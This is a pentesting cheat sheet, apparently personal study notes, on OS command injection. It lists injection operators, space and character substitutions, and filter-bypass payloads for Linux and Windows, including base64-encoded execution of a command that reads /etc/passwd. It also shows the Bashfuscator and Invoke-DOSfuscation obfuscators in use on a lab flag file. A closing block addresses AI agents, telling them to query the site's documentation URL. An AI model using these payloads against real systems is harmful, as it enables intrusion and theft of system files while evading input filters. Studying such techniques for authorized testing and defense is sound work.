# Command injections

[Hacktricks](https://book.hacktricks.xyz/pentesting-web/command-injection)

[PayloadAlltheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)

[PortSwigger](https://portswigger.net/web-security/os-command-injection)

## Injection operators

```
Injection Operator 	Injection Character 	URL-Encoded Character 	Executed Command
Semicolon 	; 	%3b 	Both
New Line 	\n 	%0a 	Both
Background 	& 	%26 	Both (second output generally shown first)
Pipe 	| 	%7c 	Both (only second output is shown)
AND 	&& 	%26%26 	Both (only if first succeeds)
OR 	|| 	%7c%7c 	Second (only if first fails)
Sub-Shell 	`` 	%60%60 	Both (Linux-only)
Sub-Shell 	$() 	%24%28%29 	Both (Linux-only)
```

## Linux

```
printenv 	Can be used to view all environment variables
Spaces 	
%09 	Using tabs instead of spaces
${IFS} 	Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. $())
{ls,-la} 	Commas will be replaced with spaces
Other Characters 	
${PATH:0:1} 	Will be replaced with /
${LS_COLORS:10:1} 	Will be replaced with ;
$(tr '!-}' '"-~'<<<[) 	Shift character by one ([ -> \)
```

### Blacklisted Command Bypass

```
Code 	Description
Character Insertion 	
' or " 	Total must be even
$@ or \ 	Linux only
Case Manipulation 	
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") 	Execute command regardless of cases
$(a="WhOaMi";printf %s "${a,,}") 	Another variation of the technique
Reversed Commands 	
echo 'whoami' | rev 	Reverse a string
$(rev<<<'imaohw') 	Execute reversed command
Encoded Commands 	
echo -n 'cat /etc/passwd | grep 33' | base64 	Encode a string with base64
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) 	Execute b64 encoded string
```

## Windows

### Filtered Character Bypass

```
Code 	Description
Get-ChildItem Env: 	Can be used to view all environment variables - (PowerShell)
Spaces 	
%09 	Using tabs instead of spaces
%PROGRAMFILES:~10,-5% 	Will be replaced with a space - (CMD)
$env:PROGRAMFILES[10] 	Will be replaced with a space - (PowerShell)
Other Characters 	
%HOMEPATH:~0,-17% 	Will be replaced with \ - (CMD)
$env:HOMEPATH[0] 	Will be replaced with \ - (PowerShell)
```

### Blacklisted Command Bypass

```
Code 	Description
Character Insertion 	
' or " 	Total must be even
^ 	Windows only (CMD)
Case Manipulation 	
WhoAmi 	Simply send the character with odd cases
Reversed Commands 	
"whoami"[-1..-20] -join '' 	Reverse a string
iex "$('imaohw'[-1..-20] -join '')" 	Execute reversed command
Encoded Commands 	
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami')) 	Encode a string with base64
iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
```

## Evasion Tools

### Linux

A handy tool we can utilize for obfuscating bash commands is [Bashfuscator](https://github.com/Bashfuscator/Bashfuscator).

```
git clone https://github.com/Bashfuscator/Bashfuscator
cd Bashfuscator
python3 setup.py install --user

```

### Windows

There is also a very similar tool that we can use for Windows called [DOSfuscation](https://github.com/danielbohannon/Invoke-DOSfuscation). Unlike `Bashfuscator`, this is an interactive tool.

```
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
Invoke-DOSfuscation> help
```

We can even use `tutorial` to see an example of how the tool works. Once we are set, we can start using the tool, as follows:

```
Invoke-DOSfuscation> SET COMMAND type C:\Users\htb-student\Desktop\flag.txt
Invoke-DOSfuscation> encoding
Invoke-DOSfuscation\Encoding> 1

...SNIP...
Result:
typ%TEMP:~-3,-2% %CommonProgramFiles:~17,-11%:\Users\h%TMP:~-13,-12%b-stu%SystemRoot:~-4,-3%ent%TMP:~-19,-18%%ALLUSERSPROFILE:~-4,-3%esktop\flag.%TMP:~-13,-12%xt


```

Finally, we can try running the obfuscated command on `CMD`, and we see that it indeed works as expected:

```
C:\htb> typ%TEMP:~-3,-2% %CommonProgramFiles:~17,-11%:\Users\h%TMP:~-13,-12%b-stu%SystemRoot:~-4,-3%ent%TMP:~-19,-18%%ALLUSERSPROFILE:~-4,-3%esktop\flag.%TMP:~-13,-12%xt

test_flag
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://staphysec.gitbook.io/staphysec/pentesting-web/command-injections.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.